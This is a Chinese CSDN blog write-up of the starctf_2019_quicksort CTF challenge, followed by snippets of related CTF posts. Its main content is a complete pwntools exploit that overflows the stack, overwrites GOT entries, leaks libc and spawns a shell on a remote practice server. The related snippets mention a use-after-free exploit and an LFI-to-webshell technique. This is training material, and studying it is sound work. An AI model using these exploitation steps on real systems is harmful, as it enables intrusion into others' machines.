starctf_2019_quicksort

最新推荐文章于 2023-08-24 11:32:32 发布
最新推荐文章于 2023-08-24 11:32:32 发布
阅读量333 收藏 1
点赞数 1
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107567862
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

starctf_2019_quicksort

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,栈溢出,可以将ptr指针覆盖掉,因此,我们可以任意地址写。

那么,我们可以将free的got表修改为main函数,这样就可以进行多次利用,同时后面的printf可以泄露地址

#coding:utf8
from pwn import *
from LibcSearcher import *

#sh = process('./starctf_2019_quicksort',env={'LD_PRELOAD':'./libc-2.23_x86.so'})
sh = remote('node3.buuoj.cn',26439)
elf = ELF('./starctf_2019_quicksort')
libc = ELF('./libc-2.23_x86.so')
gets_got = elf.got['gets']
atoi_got = elf.got['atoi']
vuln_addr = 0x08048816
sh.sendlineafter('sort?','1')

#修改free的got表为main,同时泄露puts的地址
payload = str(vuln_addr).ljust(0x10,'\x00') + p32(1)*2 + p32(0) + p32(gets_got)
sh.sendlineafter('number:',payload)
sh.recvuntil('result:\n')
gets_addr = int(sh.recvuntil('\n',drop = True)) + 0x100000000
libc_base = gets_addr - libc.sym['gets']
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)

sh.sendlineafter('sort?','1')
payload = str(system_addr - 0x100000000).ljust(0x10,'\x00') + p32(1)*2 + p32(0) + p32(atoi_got - 0x4)
sh.sendlineafter('number:',payload)
#getshell
sh.sendlineafter('sort?','1')
sh.sendlineafter('number:','/bin/sh\x00')

sh.interactive()

 

ha1vk
关注
专栏目录
starctf 2019 hackme
weixin_46483787的博客
04-19 2590
学kernel的第四天 解包之后发现init是空的,好怪哦 接下来分析ko文件,可以看到只实现了一个ioctl比较有用 首先是与用户态交互,交互方式是每次32字节,可以看做一个结构体 struct io { dword idx dword padding qword buf qword len qword offset } 然后实现了增删读写四个功能 在读写的时候进行了怎样的操作我们来观察一下: 首先会根据传入的结构体中的idx来确定对哪个chunk进行操作,然后根据offset来确定要读写
StarCTF oh-my-bet
lllffg的博客
02-18 1384
图片的位置可以读到passwd,我们尝试可不可以LFI直接获得webshell LFI通过proc/self/environ直接获取webshell:https://yq.aliyun.com/articles/441861 /proc/self/environ: HOSTNAME=3bc5e11b1b0cSHLVL=1PYTHON_PIP_VERSION=9.0.1HOME=/home/appGPG_KEY=0D96DF4D4110E5C43FBFB17F2D347EA6AA65421DPATH=/usr
starctf_2019_girlfriend
z1r0的博客
04-10 237
starctf_2019_girlfriend 查看保护 简单题目 一个uaf 攻击思路:利用uaf打出libc。再利用double free申请到malloc_hook - 0x23,劫持malloc_hook,利用realloc调整堆栈就可以getshell了。 具体的uaf手法可以看z10r’s blog from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li
others_pwn1&&starctf_2019_girlfriend
doudoudedi
02-06 644
starctf_2019_girlfriend 正常的uaf漏洞fastbin attack exp: from pwn import * #p=process('./starctf_2019_girlfriend') p=remote('node3.buuoj.cn',27758) elf=ELF('./starctf_2019_girlfriend') libc=elf.libc def ad...
快速排序
Pwnpanda的博客
12-17 180
顺便安利一波学习数据结构&&算法的好地方:VisuAlgo #include<iostream> using namespace std; int partition(int a[], int i, int j) { int p = a[i]; int m = i; for (int k = i + 1; k <= j; k++) { if (a[k...
quicksort_quicksort_
09-29
快速排序(Quicksort)是一种高效的排序算法,由C.A.R. Hoare在1960年提出。它是基于分治策略(Divide and Conquer)的,通过选择一个基准值(pivot),将待排序的数组分为两部分,一部分的所有元素都小于基准,另一...
QuickSort_quicksort代码_快速排序_
09-29
在压缩包中的`QuickSort`文件可能包含了快速排序的完整实现,包括主函数和其他辅助函数,用于测试和展示快速排序的运作。通过阅读和理解这些代码,你可以更好地掌握快速排序的细节,并能够将其应用到自己的项目中。
PROBABILITY_QUICKSORT_ANALYSIS
03-27
在《概率分析与快速排序》("PROBABILITY_QUICKSORT_ANALYSIS")这个主题中,我们将深入探讨快速排序在最坏、最好和平均情况下的性能,并引入概率分析来理解其在大规模数据中的行为。 快速排序的主要步骤如下: 1....
quicksort_matlab_快速排序
03-31
资源名:quicksort_matlab_快速排序 资源类型:matlab项目全套源码 源码说明: 全部项目源码都是经过测试校正后百分百成功运行的,如果您下载后不能运行可联系我进行指导或者更换。 适合人群:新手及有一定经验的...
Lab_4_QuickSort
02-16
在本实验中,您将实现书中描述的quicksort算法。 尽管还有其他选择枢轴值的方法,但您应遵循本书10.9节中介绍的算法。 您将需要在代码上运行valgrind,以确保没有内存泄漏或其他错误。 在实验中,您将需要使用析构...
starctf2021:* CTF2021的官方源代码和内容
03-20
starctf2021 * CTF2021的官方源代码和内容
【Writeup】starCTF2019_Browser_OOB
BAKUMANSEC - Just Do It
08-19 888
本题提供了v8的commit版本号以及一个浏览器程序包,内含一个diff文件,关于如何配置v8环境已经在如下文章中记录:【环境配置】如何编译V8引擎并添加diff补丁 0x01 解题思路 ​  首先可以利用array.oob()方法进行数组对象MAP类型的读取,利用array.oob([map])进行数组对象MAP类型的修改。由此可以利用一个float类型数组和一个object类型数组实现两...
初遇z3并与starCTF碰面
m0_38094687的博客
04-27 724
z3的初次使用与*CTF的web题解 z3的介绍与使用 介绍 Z3 是一个微软出品的开源约束求解器,能够解决很多种情况下的给定部分约束条件寻求一组满足条件的解的问题.在CTF中的应用主要在CRYPTO上. 安装 pip安装:pip install z3 如果发现安装了用不了,可以使用pip install z3-solver 使用 from z3 import ...
starctf_2019_upxofcpp
seaaseesa的博客
04-30 535
starctf_2019_upxofcpp 程序用了UPX壳保护,通过upx –d脱壳后,拿到IDA里分析。 Delete以后没有清空指针,存在UAF,但是无法double free,因为程序中使用虚表调用,delete一次后,虚表对应位置已经被清空。因此第二次delete同一个chunk将进入else语句,进而崩溃。由于函数指针放在chunk里,因此,我们可以伪虚表指针,再利用UAF来执...
CTF WriteUp】2021 starCTF部分Crypto题解
cccchhhh6819的博客
01-18 4465
(打比赛感想:大佬真TM多。。。) Crypto Crypto-GuessKey 题目 from random import randint import os from flag import flag N=64 key=randint(0,2**N) print key key=bin(key)[2:].rjust(N,'0') count=0 while True: p=0 q=0 new_key='' zeros=[0] for j in range(len(key)): if key
Jarvis OJ-PWN-Tell Me Something wp
分不清东西南北的Laffey
11-02 408
开启了NX保护 说明栈中数据没有执行权限 拖到IDA里看一下 通过观察IDA左侧的函数栏可以看到一个good_game函数 点进去观察 我们看到了flag.txt 可以想到flag应该就在这个txt文档里 于是我们就可以让溢出的返回地址为good_game函数 通过cyclic或者IDA来获取长度 from pwn import * #p=process("./guestbook") ...
starctf_2019_babyshell
最新发布
qq_62887641的博客
08-24 112
我们需要组成一个汇编指令,一来是绕过检测,二来是不妨碍shellcode。buf设置了可执行,所以往里面写shellcode就可以直接执行。当a1=0直接绕过这个,所以我们的在shellcode前面需要。可改got,没有canary,不可执行栈,没开pie。会妨碍shellcode的执行。介绍一个pwntools命令(
linux kernal pwn STARCTF 2019 hackme(一) 劫持modprobe_path
yongbaoii的博客
04-20 532
从用户态传入了0x20的数据,其数据放在了pool里面 在IDA里面看的话就是 就是他传入的四个QWORD 。 我们可以看得出来30001的时候就是通过v17来找到相关地址,然后kfree,再清零 所以其实就看得出来v17是index。 功能30002 v8是slab的地址 v20是从哪开始写 v9[1]里面就是size 所以就是往里面写 功能30003 上面是写进去 所以这个自然就是读出来 功能30000 读入一段 根据这一段申请slab 漏洞有两个 首先我们显而易见的在读写slab的时候对of.
large bin attack & house of strom
seaaseesa的博客
06-12 1176
large bin attack & house of strom large bin attack是一种堆利用手法,而house of strom则是在large bin attack的基础上借用unsorted bin来达到任意地址分配,首先我们从源码入手来分析large bin attack原理,然后再讲讲house of strom的原理,接着再看几个题目。 为例方便分析,以2.23为例,新版本有tcache的情况类似,只需填满tcache bin绕过tcache即可。 在free的时
sort_values
06-11
DataFrame.sort_values(by, axis=0, ascending=True, inplace=False, kind='quicksort', na_position='last') 其中,参数by表示按照哪一列或行进行排序;axis表示是按照列(0)排序还是按照行(1)排序;ascending...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值